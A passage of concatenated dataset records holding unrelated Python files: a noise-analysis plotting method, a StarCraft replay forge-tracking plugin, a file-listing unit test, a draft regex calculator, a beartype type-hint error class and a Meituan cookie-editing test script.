0.98'])[idxes2]\n\n        from scipy.stats import spearmanr\n        import seaborn as sns\n        sns.set()\n        spearman1 = round(spearmanr(-1*q951[noise_index], wd_data_c1[noise_index])[0], 3)\n        spearman2 = round(spearmanr(-1*q981[noise_index], wd_data_c1[noise_index])[0], 3)\n        if not allnoisesplot:\n            fig, ax = plt.subplots(figsize=(7,7))\n            ax.scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\",\n                       label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n            # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n            ax.scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\",\n                       label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n            # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n            ax.set_xlabel(r\"$Y(\\mathcal{F}_{\\rm Th})$\", fontsize=fs)\n            ax.set_ylabel(\"RIM\", fontsize=fs)\n            ax.tick_params(axis='both', which='major', labelsize=fs)\n            ax.legend(fontsize=15)\n            ax.set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n            savename = \"qfactorintuition_N\"+str(self.Nspin)+\"to\"+str(self.outspin)\n            fname = self.save_fig(fig, name=savename, copyto=self.poster_fig_save_folder)\n            return\n\n        else:\n            fig, ax = plt.subplots(nrows=5, ncols=2)\n            ax = ax.ravel()\n            fs = 15\n            for noise_index in range(1, len(self.noises)):\n                spearman1 = round(spearmanr(-1*q951[noise_index], wd_data_c1[noise_index])[0], 3)\n                spearman2 = round(spearmanr(-1*q981[noise_index], wd_data_c1[noise_index])[0], 3)\n                ax[noise_index-1].scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\",\n                                          label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n                # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n                ax[noise_index-1].scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\",\n                                          label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n                # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n                ax[noise_index-1].set_xlabel(r\"$Y(\\mathcal{F}_{\\rm Th})$\", fontsize=fs)\n                ax[noise_index-1].set_ylabel(\"RIM\", fontsize=fs)\n                ax[noise_index-1].tick_params(axis='both', which='major', labelsize=fs)\n                ax[noise_index-1].legend(fontsize=fs-5)\n                ax[noise_index-1].set_ylim(0,1)\n                ax[noise_index-1].set_xlim(0,1)\n                ax[noise_index-1].set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n            ax = ax.reshape((5,2))\n            remove_redundant_ticks(ax, pltrows=5, pltcols=2, remove_x_title_too=True)\n            # plt.tight_layout()\n\n\nfor n, o in zip([4,5,6,7,4,5,6,7], [2,2,3,3,3,4,5,6]):\n    # ExploringRIMK (not the MCDataSim base class) is what defines exploring_rim_k\n    y = ExploringRIMK(experiment_name=\"pipeline_snob\", Nspin=n, outspin=o,\n                      bootreps=100, parallel=False, numcontrollers=1000, filemarker=\".le\",  # None,\n                      noises=np.linspace(0,0.1,11))\n    for algo in [\"snob\", \"ppo\", \"lbfgs\"]:\n        for i in range(10):\n            try:\n                y.exploring_rim_k(noise_index=i, save_dir=\"rim_p_figs\", topk=50, algo=algo)\n            except Exception as e:\n                print(e)","sub_path":"exploring_rimk.py","file_name":"exploring_rimk.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"102105948","text":"from sys import maxint\n\nfrom Buildings.BuildingManager import BuildTypes\nfrom Buildings.BuildingManager import BuildingManager\nfrom Buildings.Forge import Forge\nfrom Buildings.Forge import Upgrade\nfrom Buildings.Nexus import ChronoBoost\n\n# Plugin to keep track of a player's forges throughout the game. Accounts for\n# each upgrade researched by a forge, and each ChronoBoost applied to a forge.\nclass ForgePlugin(object):\n\t# Name of the player to watch during the replay\n\tplayerName = str()\n\n\t# Length of the game (in seconds)\n\tgameLength = int()\n\n\t# A reference to the global building manager\n\tbuildingManager = object()\n\n\tdef __init__(self, playerName):\n\t\tself.name = self.__class__.__module__\n\n\t\tself.playerName = playerName\n\t\tself.gameLength = 0\n\t\tself.buildingManager = BuildingManager.GetInstance()\n\n\tdef __str__(self):\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\t\tforges = sorted(forges.items(), key=lambda tup: tup[1].buildStartTime)\n\n\t\tret = '%d forge(s) constructed\\n\\n' % (len(forges))\n\n\t\tfor i in range(len(forges)):\n\t\t\tret += str(forges[i][1]) + '\\n'\n\n\t\treturn ret\n\n\t# Game started\n\tdef handleInitGame(self, event, replay):\n\t\tself.gameLength = replay.game_length.seconds\n\n\t# Upgrade start\n\tdef handleBasicCommandEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tupgradeName = event.ability.name\n\t\tupgradeType = Upgrade.GetType(upgradeName)\n\t\tupgradeLevel = Upgrade.GetLevel(upgradeName)\n\n\t\tif (upgradeType == -1) or (upgradeLevel == -1):\n\t\t\treturn\n\n\t\tupgradeID = event.ability_id\n\t\tstartTime = event.second\n\n\t\t# The currently active selection is index 10\n\t\tactiveSelection = event.player.selection[10]\n\t\tselectedForges = [self.buildingManager.GetBuilding(o.id) for o in activeSelection if (o.name == Forge.NAME)]\n\n\t\t# Then round robin select the forge which should do this upgrade\n\t\tforge = self._getCastingForge(startTime, selectedForges)\n\n\t\tif forge is not None:\n\t\t\tupgrade = Upgrade(forge.destroyedTime, startTime, upgradeName, upgradeType, upgradeLevel)\n\t\t\tforge.addUpgrade(upgradeID, upgrade)\n\t\telse:\n\t\t\traise Exception('Performing upgrade on unknown Forge: ' + upgradeName)\n\n\t# Upgrade complete\n\tdef handleUpgradeCompleteEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tupgrade = None\n\t\tupgradeName = event.upgrade_type_name\n\t\tupgradeType = Upgrade.GetType(upgradeName)\n\t\tupgradeLevel = Upgrade.GetLevel(upgradeName)\n\n\t\tif (upgradeType == -1) or (upgradeLevel == -1):\n\t\t\treturn\n\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\n\t\tfor forgeID in forges:\n\t\t\tforge = forges[forgeID]\n\t\t\tnextUpgrade = forge.findLastUpgradeByTypeAndLevel(upgradeType, upgradeLevel)\n\n\t\t\tif nextUpgrade is not None:\n\t\t\t\tif upgrade is None or nextUpgrade.startTime > upgrade.startTime:\n\t\t\t\t\tupgrade = nextUpgrade\n\n\t\tif upgrade is not None:\n\t\t\tupgrade.endTime = event.second\n\t\telse:\n\t\t\traise Exception('Upgrade completed with no known start: ' + upgradeName)\n\n\t# Chrono boost\n\tdef handleTargetUnitCommandEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tif not event.has_ability or (event.ability.name != ChronoBoost.NAME):\n\t\t\treturn\n\n\t\tforge = self.buildingManager.GetBuilding(event.target.id)\n\n\t\t# For now just add the 
ChronoBoost to the forge, since we don't know\n\t\t# when every upgrade will start/end yet\n\t\tif (forge is not None) and (forge.buildType == BuildTypes.FORGE):\n\t\t\tforge.addChronoBoost(ChronoBoost(event.second))\n\n\t# Game finished\n\tdef handleEndGame(self, event, replay):\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\n\t\tfor forgeID in forges:\n\t\t\tforge = forges[forgeID]\n\n\t\t\t# Queued upgrades will have incorrect start times. Fix them.\n\t\t\tforge.fixUpgradeStartTimes()\n\n\t\t\t# Assign all ChronoBoosts to specific upgrades\n\t\t\tfor chronoBoost in forge.chronoBoosts:\n\t\t\t\t# Get all upgrades in the ChronoBoost time range (boost may apply to multiple)\n\t\t\t\tupgrades = forge.findUpgradesByTime(chronoBoost.startTime, chronoBoost.endTime)\n\n\t\t\t\tfor upgrade in upgrades:\n\t\t\t\t\tupgrade.addChronoBoost(chronoBoost)\n\n\t# From a list of currently selected forges, round-robin select a forge to\n\t# perform the next upgrade\n\tdef _getCastingForge(self, time, selectedForges):\n\t\tminForge = None\n\t\tminCount = maxint\n\n\t\tfor forge in selectedForges:\n\t\t\tupgradeCount = 0\n\n\t\t\tfor upgradeID in forge.upgrades:\n\t\t\t\tupgrade = forge.upgrades[upgradeID]\n\n\t\t\t\tif (upgrade.startTime <= time) and (time <= upgrade.endTime):\n\t\t\t\t\tupgradeCount += 1\n\n\t\t\tif upgradeCount < minCount:\n\t\t\t\tminCount = upgradeCount\n\t\t\t\tminForge = forge\n\n\t\treturn minForge\n\n","sub_path":"Plugins/ForgePlugin.py","file_name":"ForgePlugin.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"515462749","text":"\"\"\" Unit test to test get_files\n\"\"\"\nimport random\nimport string\nimport tempfile\nimport unittest\n\nfrom get_files import get_files\n\n\nclass TestGetFiles(unittest.TestCase):\n \"\"\"\n Class to test get_files module\n \"\"\"\n\n def test_get_all_files(self):\n \"\"\" Tests get list of files in temp dir.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n all_files = get_files.get_files_by_regex(temp_dir, '')\n\n self.assertGreater(len(all_files), 0)\n\n def test_get_file_by_regex(self):\n \"\"\" Tests get list of files by regex.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n temp = tempfile.NamedTemporaryFile(\n prefix=\"dummyPrefix_\", suffix=\"_dummySuffix\")\n dummy_file = get_files.get_files_by_regex(temp_dir, 'dummyPrefix_')\n\n self.assertEqual(len(dummy_file), 1)\n\n def test_get_file_not_valid(self):\n \"\"\" Tests get list of files for invalid directory.\n \"\"\"\n\n random_dir = ''.join(random.choice(string.ascii_lowercase)\n for i in range(10))\n\n random_dir_files = get_files.get_files_by_regex(random_dir, '')\n\n self.assertEqual(len(random_dir_files), 0)\n\n def test_get_file_not_valid_regex(self):\n \"\"\" Tests get list of files for random regex.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n random_regex = ''.join(random.choice(\n string.ascii_lowercase) for i in range(10))\n regex_files = get_files.get_files_by_regex(temp_dir, random_regex)\n\n self.assertEqual(len(regex_files), 0)\n\n def test_get_not_valid_regex(self):\n \"\"\" Tests get list of files for random regex.\n \"\"\"\n temp_dir = tempfile.gettempdir()\n random_regex = '**'\n try:\n get_files.get_files_by_regex(temp_dir, random_regex)\n except:\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/get_files_test.py","file_name":"get_files_test.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"399753690","text":"\nfrom re import fullmatch,search\na = '3/4 +6**2-6*4 -123 +6*3**---2//4 +100/55='\nb = '3/4 +6**2-6*4/ 0 -123 +6*3**2/4 +100/0='\nc = ''\ndef calc(c):\n\tif fullmatch(r'[0-9\\/\\*\\-\\+\\ ]+',c[:-1]) and not search(r'\\/\\s*0',c[:-1]) and c[-1] == '=':\n\t\tprint(eval(c[:-1]))\n\telse:\n\t\tprint('Wrong request!')\n\t\ncalc(a)\ncalc(b)\ncalc(c)\n\n#3.25\n#Wrong request!\n#Wrong request!\n#[Program finished]\n\n#brackets need exceptiob zero\n# хотя можно и вычислять то, что в кобках..., если цель без эксепшнов\n# через стэк самые вложенные скобки\n# или рег группами о.о\n#parenthisis check for balanced\n#zapretit sosedstvo (*, +), но оставить (-\n\n#add parsing %\n#any ----at the end of operation\n#allow **, //\n#forbid any other 2symbol\n#make it decimal\n#separate errors in other ifs\n\n#test with random generated\n#похоже, что решение через евал не легче, т.к. сменили сложность вычислений на сложность проверки\n\ndef do_parentheses_match(input_string):\n s = []\n balanced = True\n index = 0\n while index < len(input_string) and balanced:\n token = input_string[index]\n if token == \"(\":\n s.append(token)\n elif token == \")\":\n if len(s) == 0:\n balanced = False\n else:\n s.pop()\n\n index += 1\n\n return balanced and len(s) == 0\n \n ","sub_path":"regexp_calc_draft.py","file_name":"regexp_calc_draft.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449069319","text":"#!/usr/bin/env python3\n# --------------------( LICENSE )--------------------\n# Copyright (c) 2014-2021 Beartype authors.\n# See \"LICENSE\" for further details.\n\n'''\n**Beartype type-checking error cause sleuth** (i.e., object recursively\nfabricating the human-readable string describing the failure of the pith\nassociated with this object to satisfy this PEP-compliant type hint also\nassociated with this object) classes.\n\nThis private submodule is *not* intended for importation by downstream callers.\n'''\n\n# ....................{ IMPORTS }....................\nfrom beartype.cave import NoneType, NoneTypeOr\nfrom beartype.roar import _BeartypeCallHintPepRaiseException\nfrom beartype._util.hint.pep.proposal.utilhintpep484 import (\n get_hint_pep484_newtype_class,\n is_hint_pep484_newtype,\n)\nfrom beartype._util.hint.pep.proposal.utilhintpep544 import (\n get_hint_pep544_io_protocol_from_generic,\n is_hint_pep544_io_generic,\n)\nfrom beartype._util.hint.pep.proposal.utilhintpep593 import (\n get_hint_pep593_hint,\n is_hint_pep593,\n)\nfrom beartype._util.hint.pep.utilhintpepget import (\n get_hint_pep_args,\n get_hint_pep_generic_bases_unerased,\n get_hint_pep_sign,\n)\nfrom beartype._util.hint.pep.utilhintpeptest import (\n is_hint_pep,\n is_hint_pep_generic,\n is_hint_pep_tuple_empty,\n is_hint_pep_typevar,\n)\nfrom beartype._util.hint.utilhinttest import (\n is_hint_forwardref,\n is_hint_ignorable,\n)\nfrom typing import Any, Callable, NoReturn, Optional, Tuple\n\n# See the \"beartype.cave\" submodule for further commentary.\n__all__ = ['STAR_IMPORTS_CONSIDERED_HARMFUL']\n\n# ....................{ CLASSES }....................\nclass CauseSleuth(object):\n '''\n **Type-checking error cause sleuth** (i.e., object recursively fabricating\n the human-readable string describing the failure of the pith associated\n with this object to satisfy this PEP-compliant type hint also associated\n with this object).\n\n Attributes\n ----------\n cause_indent : str\n **Indentation** (i.e., string of zero or more spaces) preceding each\n line of the string returned by this getter if this string spans\n multiple lines *or* ignored otherwise (i.e., if this string is instead\n embedded in the current line).\n exception_label : str\n Human-readable label describing the parameter or return value from\n which this object originates, typically embedded in exceptions raised\n from this getter in the event of unexpected runtime failure.\n func : Callable\n Decorated callable generating this type-checking error.\n hint_sign : Any\n Unsubscripted :mod:`typing` attribute identifying this hint if this hint\n is PEP-compliant *or* ``None`` otherwise.\n hint_childs : Optional[Tuple]\n Either:\n\n * If this hint is PEP-compliant:\n\n * If this hint is a generic, tuple of the one or more unerased\n pseudo-superclasses (i.e., :mod:`typing` objects originally listed\n as superclasses prior to their implicit type erasure by the\n :mod:`typing` module) subclassed by this generic.\n * Else, the possibly empty tuple of all arguments subscripting this\n hint if this\n\n * Else, ``None``.\n pith : Any\n Arbitrary object to be validated.\n random_int: Optional[int]\n **Pseudo-random integer** (i.e., unsigned 32-bit integer\n pseudo-randomly generated by the parent :func:`beartype.beartype`\n wrapper function in type-checking randomly indexed container items by\n the current call to that function) if that function generated such an\n integer *or* ``None`` otherwise (i.e., if that function 
generated *no*\n such integer). See the same parameter accepted by the higher-level\n :func:`beartype._decor._code._pep._error.peperror.raise_pep_call_exception`\n function for further details.\n\n Attributes (Private)\n ----------\n _hint : Any\n Type hint to validate this object against.\n '''\n\n # ..................{ CLASS VARIABLES }..................\n # Slot *ALL* instance variables defined on this object to both:\n # * Prevent accidental declaration of erroneous instance variables.\n # * Minimize space and time complexity.\n __slots__ = (\n 'cause_indent',\n 'exception_label',\n 'func',\n 'hint_sign',\n 'hint_childs',\n 'pith',\n 'random_int',\n '_hint',\n )\n\n\n _INIT_PARAM_NAMES = frozenset((\n 'cause_indent',\n 'exception_label',\n 'func',\n 'hint',\n 'pith',\n 'random_int',\n ))\n '''\n Frozen set of the names of all parameters accepted by the :meth:`init`\n method, defined as a set to enable efficient membership testing.\n '''\n\n # ..................{ INITIALIZERS }..................\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n # CAUTION: Whenever adding, deleting, or renaming any parameter accepted by\n # this method, make similar changes to the \"_INIT_PARAM_NAMES\" set above.\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n def __init__(\n self,\n func: Callable,\n pith: Any,\n hint: Any,\n cause_indent: str,\n exception_label: str,\n random_int: int,\n ) -> None:\n '''\n Initialize this object.\n '''\n assert callable(func), f'{repr(func)} not callable.'\n assert isinstance(cause_indent, str), (\n f'{repr(cause_indent)} not string.')\n assert isinstance(exception_label, str), (\n f'{repr(exception_label)} not string.')\n assert isinstance(random_int, NoneTypeOr[int]), (\n f'{repr(random_int)} not integer or \"None\".')\n\n # Classify all passed parameters.\n self.func = func\n self.pith = pith\n self.cause_indent = cause_indent\n self.exception_label = exception_label\n self.random_int = random_int\n\n # Nullify all remaining parameters for safety.\n self.hint_sign: Any = None\n self.hint_childs: Tuple = None # type: ignore[assignment]\n\n # Classify this hint *AFTER* initializing all parameters above.\n self.hint = hint\n\n # ..................{ PROPERTIES }..................\n @property\n def hint(self) -> Any:\n '''\n Type hint to validate this object against.\n '''\n\n return self._hint\n\n\n @hint.setter\n def hint(self, hint: Any) -> None:\n '''\n Set the type hint to validate this object against.\n '''\n\n # ................{ REDUCTION }................\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n # CAVEATS: Synchronize changes here with the corresponding block of the\n # beartype._decor._code._pep._pephint.pep_code_check_hint() function.\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n #\n # This logic reduces the currently visited hint to an arbitrary object\n # associated with this hint when this hint conditionally satisfies any\n # of various conditions.\n #\n # ................{ REDUCTION ~ pep 484 }................\n # If this is the PEP 484-compliant \"None\" singleton, reduce this hint\n # to the type of that singleton. 
While not explicitly defined by the\n # \"typing\" module, PEP 484 explicitly supports this singleton:\n # When used in a type hint, the expression None is considered\n # equivalent to type(None).\n if hint is None:\n hint = NoneType\n # If this is a PEP 484-compliant new type hint, reduce this hint to the\n # user-defined class aliased by this hint. Although this logic could\n # also be performed below, doing so here simplifies matters.\n elif is_hint_pep484_newtype(hint):\n hint = get_hint_pep484_newtype_class(hint)\n # ................{ REDUCTION ~ pep 544 }................\n # If this is a PEP 484-compliant IO generic base class *AND* the active\n # Python interpreter targets at least Python >= 3.8 and thus supports\n # PEP 544-compliant protocols, reduce this functionally useless hint to\n # the corresponding functionally useful beartype-specific PEP\n # 544-compliant protocol implementing this hint.\n #\n # Note that PEP 484-compliant IO generic base classes are technically\n # usable under Python < 3.8 (e.g., by explicitly subclassing those\n # classes from third-party classes). Ergo, we can neither safely emit\n # warnings nor raise exceptions on visiting these classes under *ANY*\n # Python version.\n elif is_hint_pep544_io_generic(hint):\n hint = get_hint_pep544_io_protocol_from_generic(hint)\n # ................{ REDUCTION ~ pep 593 }................\n # If this is a PEP 593-compliant type metahint, ignore all annotations\n # on this hint (i.e., \"hint_curr.__metadata__\" tuple) by reducing this\n # hint to its origin (e.g., \"str\" in \"Annotated[str, 50, False]\").\n elif is_hint_pep593(hint):\n hint = get_hint_pep593_hint(hint)\n # ................{ REDUCTION ~ end }................\n\n # If this hint is PEP-compliant...\n if is_hint_pep(hint):\n # Arbitrary object uniquely identifying this hint.\n self.hint_sign = get_hint_pep_sign(hint)\n\n # Tuple of either...\n self.hint_childs = (\n # If this hint is a generic, the one or more unerased\n # pseudo-superclasses originally subclassed by this hint.\n get_hint_pep_generic_bases_unerased(hint)\n if is_hint_pep_generic(hint) else\n # Else, the zero or more arguments subscripting this hint.\n get_hint_pep_args(hint)\n )\n\n # Classify this hint *AFTER* all other assignments above.\n self._hint = hint\n\n # ..................{ GETTERS }..................\n def get_cause_or_none(self) -> Optional[str]:\n '''\n Human-readable string describing the failure of this pith to satisfy\n this PEP-compliant type hint if this pith fails to satisfy this pith\n *or* ``None`` otherwise (i.e., if this pith satisfies this hint).\n\n Design\n ----------\n This getter is intentionally generalized to support objects both\n satisfying and *not* satisfying hints as equally valid use cases. While\n the parent :func:`.peperror.raise_pep_call_exception` function\n calling this getter is *always* passed an object *not* satisfying the\n passed hint, this getter is under no such constraints. Why? Because\n this getter is also called to find which of an arbitrary number of\n objects transitively nested in the object passed to\n :func:`.peperror.raise_pep_call_exception` fails to satisfy the\n corresponding hint transitively nested in the hint passed to that\n function.\n\n For example, consider the PEP-compliant type hint ``List[Union[int,\n str]]`` describing a list whose items are either integers or strings\n and the list ``list(range(256)) + [False,]`` consisting of the integers\n 0 through 255 followed by boolean ``False``. 
Since this list is a\n standard sequence, the\n :func:`._peperrorsequence.get_cause_or_none_sequence_standard`\n function must decide the cause of this list's failure to comply with\n this hint by finding the list item that is neither an integer nor a\n string, implemented by by iteratively passing each list item to the\n :func:`._peperrorunion.get_cause_or_none_union` function. Since\n the first 256 items of this list are integers satisfying this hint,\n :func:`._peperrorunion.get_cause_or_none_union` returns\n ``None`` to\n :func:`._peperrorsequence.get_cause_or_none_sequence_standard`\n before finally finding the non-compliant boolean item and returning the\n human-readable cause.\n\n Returns\n ----------\n Optional[str]\n Either:\n\n * If this object fails to satisfy this hint, human-readable string\n describing the failure of this object to do so.\n * Else, ``None``.\n\n Raises\n ----------\n _BeartypeCallHintPepRaiseException\n If this type hint is either:\n\n * PEP-noncompliant (e.g., tuple union).\n * PEP-compliant but no getter function has been implemented to\n handle this category of PEP-compliant type hint yet.\n '''\n\n # Getter function returning the desired string.\n get_cause_or_none = None\n\n # If this hint is ignorable, all possible objects satisfy this hint,\n # implying this hint *CANNOT* by definition be the cause of this\n # failure. In this case, immediately report None.\n if is_hint_ignorable(self.hint):\n return None\n # Else, this hint is unignorable.\n #\n # If *NO* sign uniquely identifies this hint, this hint is\n # PEP-noncompliant. In this case...\n elif self.hint_sign is None:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrortype import (\n get_cause_or_none_type)\n\n # Defer to the getter function supporting non-\"typing\" classes.\n get_cause_or_none = get_cause_or_none_type\n # Else, this hint is PEP-compliant.\n #\n # If this PEP-compliant hint is its own unsubscripted \"typing\"\n # attribute (e.g., \"typing.List\" rather than \"typing.List[str]\") and is\n # thus subscripted by *NO* child hints...\n elif self.hint is self.hint_sign:\n # If this hint is the non-standard \"typing.NoReturn\" type hint\n # specific to return values...\n if self.hint is NoReturn:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrorreturn import (\n get_cause_or_none_noreturn)\n\n # Defer to the getter function specific to this hint.\n get_cause_or_none = get_cause_or_none_noreturn\n # Else, this hint is a standard PEP-compliant type hint supported\n # by both parameters and return values. In this case, we assume\n # this hint to originate from an origin type.\n else:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrortype import (\n get_cause_or_none_type_origin)\n\n # Defer to the getter function supporting hints originating\n # from origin types.\n get_cause_or_none = get_cause_or_none_type_origin\n # Else, this PEP-compliant hint is *NOT* its own unsubscripted \"typing\"\n # attribute. 
In this case...\n else:\n # If this hint is neither...\n if not (\n # Subscripted by no child hints *NOR*...\n self.hint_childs or\n # An empty fixed-length tuple hint, whose PEP 585 (but *NOT*\n # PEP 484)-compliant implementation is subscripted by no child\n # hints *NOR*...\n is_hint_pep_tuple_empty(self.hint) or\n # A forward reference nor type variable, whose designs reside\n # well outside the standard \"typing\" dunder variable API and\n # are thus *NEVER* subscripted by child hints...\n is_hint_forwardref(self.hint) or\n is_hint_pep_typevar(self.hint)\n ):\n # Then this hint should have been subscripted by one or more child\n # hints but wasn't. In this case, raise an exception.\n raise _BeartypeCallHintPepRaiseException(\n f'{self.exception_label} PEP type hint '\n f'{repr(self.hint)} unsubscripted.'\n )\n # Else, thus subscripted by one or more child hints (e.g.,\n # \"typing.List[str]\" rather than \"typing.List\")\n #\n # Else, this hint is subscripted by one or more child hints.\n\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error.peperror import (\n PEP_HINT_SIGN_TO_GET_CAUSE_FUNC)\n\n # Getter function returning the desired string for this attribute\n # if any *OR* \"None\" otherwise.\n get_cause_or_none = PEP_HINT_SIGN_TO_GET_CAUSE_FUNC.get(\n self.hint_sign, None)\n\n # If no such function has been implemented to handle this attribute\n # yet, raise an exception.\n if get_cause_or_none is None:\n raise _BeartypeCallHintPepRaiseException(\n f'{self.exception_label} PEP type hint '\n f'{repr(self.hint)} unsupported (i.e., no '\n f'\"get_cause_or_none_\"-prefixed getter function defined '\n f'for this category of hint).'\n )\n # Else, a getter function has been implemented to handle this\n # attribute.\n\n # Call this getter function with ourselves and return the string\n # returned by this getter.\n return get_cause_or_none(self)\n\n # ..................{ PERMUTERS }..................\n def permute(self, **kwargs) -> 'CauseSleuth':\n '''\n Shallow copy of this object such that each the passed keyword argument\n overwrites the instance variable of the same name in this copy.\n\n Parameters\n ----------\n Keyword arguments of the same name and type as instance variables of\n this object (e.g., ``hint``, ``pith``).\n\n Returns\n ----------\n CauseSleuth\n Shallow copy of this object such that each keyword argument\n overwrites the instance variable of the same name in this copy.\n\n Raises\n ----------\n _BeartypeCallHintPepRaiseException\n If the name of any passed keyword argument is *not* the name of an\n existing instance variable of this object.\n\n Examples\n ----------\n >>> sleuth = CauseSleuth(\n ... pith=[42,]\n ... hint=typing.List[int],\n ... cause_indent='',\n ... exception_label='List of integers',\n ... 
)\n >>> sleuth_copy = sleuth.permute(pith=[24,])\n >>> sleuth_copy.pith\n [24,]\n >>> sleuth_copy.hint\n typing.List[int]\n '''\n\n # For the name of each passed keyword argument...\n for param_name in kwargs.keys():\n # If this name is *NOT* that of a parameter accepted by the\n # __init__() method, raise an exception.\n if param_name not in self._INIT_PARAM_NAMES:\n raise _BeartypeCallHintPepRaiseException(\n f'{self.__class__}.__init__() parameter '\n f'{param_name} unrecognized.'\n )\n\n # For the name of each parameter accepted by the __init__() method...\n for param_name in self._INIT_PARAM_NAMES:\n # If this parameter was *NOT* explicitly passed by the caller,\n # default this parameter to its current value from this object.\n if param_name not in kwargs:\n kwargs[param_name] = getattr(self, param_name)\n\n # Return a new instance of this class initialized with these arguments.\n return CauseSleuth(**kwargs)\n","sub_path":"beartype/_decor/_code/_pep/_error/_peperrorsleuth.py","file_name":"_peperrorsleuth.py","file_ext":"py","file_size_in_byte":20042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"278555598","text":"\n\nfrom xai.brain.wordbase.nouns._byword import _BYWORD\n\n#calss header\nclass _BYWORDS(_BYWORD, ):\n\tdef __init__(self,): \n\t\t_BYWORD.__init__(self)\n\t\tself.name = \"BYWORDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"byword\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_bywords.py","file_name":"_bywords.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"638762676","text":"import random\nimport re\nimport time\n\nimport requests\n\nfrom meituanwaimai.meituan.Ua_cookie import COOKIE\n\n\ndef _send_request(index, lat, long):\n url = \"http://i.waimai.meituan.com/openh5/homepage/poilist?_={}\".format(int(time.time()))\n form_data = {\n \"startIndex\": \"{}\".format(index),\n \"wm_actual_latitude\": \"{}\".format(lat),\n \"wm_actual_longitude\": \"{}\".format(long),\n }\n cookie = random.choice(COOKIE)\n print(cookie)\n old_lat = re.compile(r'w_actual_lat=(\\d+)').findall(cookie)[0]\n old_lng = re.compile(r'w_actual_lng=(\\d+)').findall(cookie)[0]\n cookie = cookie.replace(old_lat, str(lat))\n cookie = cookie.replace(old_lng, str(long))\n old_w_latlng = re.compile(r' w_latlng=(\\d+,\\d+);').findall(cookie)[0]\n cookie = cookie.replace(old_w_latlng, f'{lat},{long}')\n print(old_lat)\n print(cookie)\n print(old_w_latlng)\n headers = {\n \"Cookie\": cookie\n }\n\n\ndef main():\n _send_request(1, 2, 3)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"meituanwaimai/meituan/test_cookie.py","file_name":"test_cookie.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
